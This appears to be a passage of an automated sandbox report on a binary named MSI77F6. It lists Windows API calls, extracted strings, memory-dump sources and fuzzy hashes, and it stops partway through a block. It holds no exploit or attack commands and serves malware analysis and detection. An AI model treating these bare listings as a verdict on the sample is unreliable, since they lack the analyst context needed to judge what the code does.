                                        • Opcode ID: 0d1596099c7ea9f3fc8095ee6d2392fea8ace1f81b67c4d671e6a5a66749e8fc
                                        • Instruction ID: 7fb665c5fc3f83dc83654dc3b47eb7993d212d33b9830faf03e9bfb06979650a
                                        • Opcode Fuzzy Hash: 0d1596099c7ea9f3fc8095ee6d2392fea8ace1f81b67c4d671e6a5a66749e8fc
                                        • Instruction Fuzzy Hash: 84918234244301DFCB18EF14C855A69B7B2BF98350F04885DF8965B7A2DB39ED4ACB52
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007DE3BB
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007DBCBF), ref: 007DE417
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DE457
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DE49C
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DE4D3
                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,007DBCBF), ref: 007DE4DF
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DE4EF
                                        • DestroyCursor.USER32(?), ref: 007DE4FE
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007DE51B
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007DE527
                                          • Part of subcall function 00791BC7: __wcsicmp_l.LIBCMT ref: 00791C50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 3907162815-1154884017
                                        • Opcode ID: b3f045d599aa2a3bd5c0faa8871e1c51d8c7d0e6b6c0f633e3c5bfc9cea23bbd
                                        • Instruction ID: d3a81bf294b93add10eb0774cdae205887a497592adb2d3a1bcbeb3306fa3d4a
                                        • Opcode Fuzzy Hash: b3f045d599aa2a3bd5c0faa8871e1c51d8c7d0e6b6c0f633e3c5bfc9cea23bbd
                                        • Instruction Fuzzy Hash: E861CE71540219FAEB25EF64DC46FBE77B8BB08720F108106F915EA2D0DB789D90D7A0
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 007C0EFF
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 007C0F0F
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007C0F1B
                                        • __wsplitpath.LIBCMT ref: 007C0F79
                                        • _wcscat.LIBCMT ref: 007C0F91
                                        • _wcscat.LIBCMT ref: 007C0FA3
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007C0FB8
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0FCC
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0FFE
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C101F
                                        • _wcscpy.LIBCMT ref: 007C102B
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007C106A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                        • String ID: *.*
                                        • API String ID: 3566783562-438819550
                                        • Opcode ID: ebbb4582d4f6d5c76a6302d177e1583642e4ef64c27d4ee54268ee40c3733241
                                        • Instruction ID: 29ff61626125dc4ab23f7c9082a6882ff7854812f9802f719d8e5fc04bdd8734
                                        • Opcode Fuzzy Hash: ebbb4582d4f6d5c76a6302d177e1583642e4ef64c27d4ee54268ee40c3733241
                                        • Instruction Fuzzy Hash: BF613F71504345EFCB10EF64C844E9AB7E9FF89310F04891EF98997252EB39EA45CB92
                                        APIs
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • CharLowerBuffW.USER32(?,?), ref: 007BDB26
                                        • GetDriveTypeW.KERNEL32 ref: 007BDB73
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BDBBB
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BDBF2
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BDC20
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 2698844021-4113822522
                                        • Opcode ID: 42b7ddbb1307207e3bea4bf4339aa954a8b8d643065ae4665fb7aa4b84f8482c
                                        • Instruction ID: 591a2e0d81b2336ed90ba54eec69aa323d679cbc804c7f249c9c5f2bab262848
                                        • Opcode Fuzzy Hash: 42b7ddbb1307207e3bea4bf4339aa954a8b8d643065ae4665fb7aa4b84f8482c
                                        • Instruction Fuzzy Hash: 11515B71104305EFCB04EF10C89596AB7E5FF88758F50886CF89997261EB79EE05CB52
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007E4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 007B3145
                                        • LoadStringW.USER32(00000000,?,007E4085,00000016), ref: 007B314E
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,007E4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 007B3170
                                        • LoadStringW.USER32(00000000,?,007E4085,00000016), ref: 007B3173
                                        • __swprintf.LIBCMT ref: 007B31B3
                                        • __swprintf.LIBCMT ref: 007B31C5
                                        • _wprintf.LIBCMT ref: 007B326C
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007B3283
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 984253442-2268648507
                                        • Opcode ID: e01fbdc43cac369cd6bd056826e96d886983572c06c72ba9ffd258167ebe5e1f
                                        • Instruction ID: 291cbc7e35c420539216e91cbb64594f5c628cdbab2fe209859cc712cfb128a5
                                        • Opcode Fuzzy Hash: e01fbdc43cac369cd6bd056826e96d886983572c06c72ba9ffd258167ebe5e1f
                                        • Instruction Fuzzy Hash: EF41407290421DFACF15FBD0DD9BEEEB778AF14741F104065B205B21A2DA6D6F44CA60
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 007BD96C
                                        • __swprintf.LIBCMT ref: 007BD98E
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 007BD9CB
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007BD9F0
                                        • _memset.LIBCMT ref: 007BDA0F
                                        • _wcsncpy.LIBCMT ref: 007BDA4B
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 007BDA80
                                        • CloseHandle.KERNEL32(00000000), ref: 007BDA8B
                                        • RemoveDirectoryW.KERNEL32(?), ref: 007BDA94
                                        • CloseHandle.KERNEL32(00000000), ref: 007BDA9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                        • String ID: :$\$\??\%s
                                        • API String ID: 2733774712-3457252023
                                        • Opcode ID: 7a2e2d4d8e0cec194459c96a133b01b2ab709e69cf4e04e8202f15500292b91e
                                        • Instruction ID: 3736d8344c17837738ce8b909ae79fd03665886edf21effa455feb748b4ba8cb
                                        • Opcode Fuzzy Hash: 7a2e2d4d8e0cec194459c96a133b01b2ab709e69cf4e04e8202f15500292b91e
                                        • Instruction Fuzzy Hash: B0319272600208AADB30DFA4DC49FEA77BDFF84710F0081A5F519D2161E7789E41CBA5
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007DBD04,?,?), ref: 007DE564
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007DBD04,?,?,00000000,?), ref: 007DE57B
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007DBD04,?,?,00000000,?), ref: 007DE586
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,007DBD04,?,?,00000000,?), ref: 007DE593
                                        • GlobalLock.KERNEL32(00000000), ref: 007DE59C
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007DBD04,?,?,00000000,?), ref: 007DE5AB
                                        • GlobalUnlock.KERNEL32(00000000), ref: 007DE5B4
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,007DBD04,?,?,00000000,?), ref: 007DE5BB
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007DE5CC
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,007FD9BC,?), ref: 007DE5E5
                                        • GlobalFree.KERNEL32(00000000), ref: 007DE5F5
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 007DE619
                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007DE644
                                        • DeleteObject.GDI32(00000000), ref: 007DE66C
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007DE682
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3840717409-0
                                        • Opcode ID: a6d949b7cf1ce5629468a752c7173f4e3c826ca74b4976fdb7e67ecfbd2ce32c
                                        • Instruction ID: ec0f6e3d7ffe5fef9f4533589ef409ec2c0ef1133e948ba6f686d84c3895dee9
                                        • Opcode Fuzzy Hash: a6d949b7cf1ce5629468a752c7173f4e3c826ca74b4976fdb7e67ecfbd2ce32c
                                        • Instruction Fuzzy Hash: 5D414A75600208EFDB21AF64DC88EAE7BBAFF89715F108059F906DB260D7389D01DB64
                                        APIs
                                        • __wsplitpath.LIBCMT ref: 007C0C93
                                        • _wcscat.LIBCMT ref: 007C0CAB
                                        • _wcscat.LIBCMT ref: 007C0CBD
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007C0CD2
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0CE6
                                        • GetFileAttributesW.KERNEL32(?), ref: 007C0CFE
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 007C0D18
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0D2A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                        • String ID: *.*
                                        • API String ID: 34673085-438819550
                                        • Opcode ID: 5d9e9d9dac0634160ef277a4d0b2621e2ecae71ef17576b7b671e1410be770d4
                                        • Instruction ID: 5bfc8917d899295323fd7df7043bb53bc622fcdec1af659cbeb1272f60bf8365
                                        • Opcode Fuzzy Hash: 5d9e9d9dac0634160ef277a4d0b2621e2ecae71ef17576b7b671e1410be770d4
                                        • Instruction Fuzzy Hash: 43815371604245DFCB64DF64C845FAAB7E8BB88314F14892EE885C7251E738ED85CBE2
                                        APIs
                                          • Part of subcall function 007AB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007AB903
                                          • Part of subcall function 007AB8E7: GetLastError.KERNEL32(?,007AB3CB,?,?,?), ref: 007AB90D
                                          • Part of subcall function 007AB8E7: GetProcessHeap.KERNEL32(00000008,?,?,007AB3CB,?,?,?), ref: 007AB91C
                                          • Part of subcall function 007AB8E7: RtlAllocateHeap.NTDLL(00000000,?,007AB3CB), ref: 007AB923
                                          • Part of subcall function 007AB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007AB93A
                                          • Part of subcall function 007AB982: GetProcessHeap.KERNEL32(00000008,007AB3E1,00000000,00000000,?,007AB3E1,?), ref: 007AB98E
                                          • Part of subcall function 007AB982: RtlAllocateHeap.NTDLL(00000000,?,007AB3E1), ref: 007AB995
                                          • Part of subcall function 007AB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007AB3E1,?), ref: 007AB9A6
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007AB5F7
                                        • _memset.LIBCMT ref: 007AB60C
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007AB62B
                                        • GetLengthSid.ADVAPI32(?), ref: 007AB63C
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 007AB679
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007AB695
                                        • GetLengthSid.ADVAPI32(?), ref: 007AB6B2
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007AB6C1
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007AB6C8
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007AB6E9
                                        • CopySid.ADVAPI32(00000000), ref: 007AB6F0
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007AB721
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007AB747
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007AB75B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: 1efae7d0c216aeb796aa6ea88ad9b0af356dfd77758ea03faaf1a6fec7650d94
                                        • Instruction ID: 957ee81d89bf06689979803623c6b0506782ed28967a1510619bd52e6a4af5c8
                                        • Opcode Fuzzy Hash: 1efae7d0c216aeb796aa6ea88ad9b0af356dfd77758ea03faaf1a6fec7650d94
                                        • Instruction Fuzzy Hash: AF515F71900209EBDF109F94DC85EFEBB7AFF89304F04825AE915A6292DB789905CB64
                                        APIs
                                        • GetDC.USER32(00000000), ref: 007CA2DD
                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007CA2E9
                                        • CreateCompatibleDC.GDI32(?), ref: 007CA2F5
                                        • SelectObject.GDI32(00000000,?), ref: 007CA302
                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007CA356
                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 007CA392
                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007CA3B6
                                        • SelectObject.GDI32(00000006,?), ref: 007CA3BE
                                        • DeleteObject.GDI32(?), ref: 007CA3C7
                                        • DeleteDC.GDI32(00000006), ref: 007CA3CE
                                        • ReleaseDC.USER32(00000000,?), ref: 007CA3D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: 62b8622501110f37093e2854ebb7745b76145a16b72f7bb9af2dc741597ff159
                                        • Instruction ID: e0caf884021a2c1bc04dc9a3ccab3e2de74c876e1ea26ceb5a491f30d632bd83
                                        • Opcode Fuzzy Hash: 62b8622501110f37093e2854ebb7745b76145a16b72f7bb9af2dc741597ff159
                                        • Instruction Fuzzy Hash: AA513875900209EFCB25CFA8DC88EAEBBB9EF48310F14851DF95A97250C739AC41CB54
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 007BD567
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 007BD589
                                        • __swprintf.LIBCMT ref: 007BD5DC
                                        • _wprintf.LIBCMT ref: 007BD68D
                                        • _wprintf.LIBCMT ref: 007BD6AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 2116804098-2391861430
                                        • Opcode ID: eab9bddfcd0bf40cf2dcc0acf22aeb1de3e5febe280e74214e30401359e3fd03
                                        • Instruction ID: 2006199c186eb21f73f811690361e4a28316b9a899d25e99bd6b8bd02f3ed943
                                        • Opcode Fuzzy Hash: eab9bddfcd0bf40cf2dcc0acf22aeb1de3e5febe280e74214e30401359e3fd03
                                        • Instruction Fuzzy Hash: 0251D372900209FACF15EBA0DD4AEEEB779AF04344F108565F109A21A1EA796F54DF60
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 007BD37F
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007BD3A0
                                        • __swprintf.LIBCMT ref: 007BD3F3
                                        • _wprintf.LIBCMT ref: 007BD499
                                        • _wprintf.LIBCMT ref: 007BD4B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 2116804098-3420473620
                                        • Opcode ID: ff921b759b90a57e9e1978787d19c78fe6ec7e4fcce2cd76b77b9b55e0a5e3b4
                                        • Instruction ID: f2d47d7b02210281ba37a0d0fc2b5dc4c24b0f964c843b4e6c6e2778cbb4e489
                                        • Opcode Fuzzy Hash: ff921b759b90a57e9e1978787d19c78fe6ec7e4fcce2cd76b77b9b55e0a5e3b4
                                        • Instruction Fuzzy Hash: A051D372900609EACF25FBA0DD5AEEEB778AF14700F108465B109B2161EA7D6F58DF60
                                        APIs
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • _memset.LIBCMT ref: 007AAF74
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007AAFA9
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007AAFC5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007AAFE1
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007AB00B
                                        • CLSIDFromString.COMBASE(?,?), ref: 007AB033
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007AB03E
                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007AB043
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
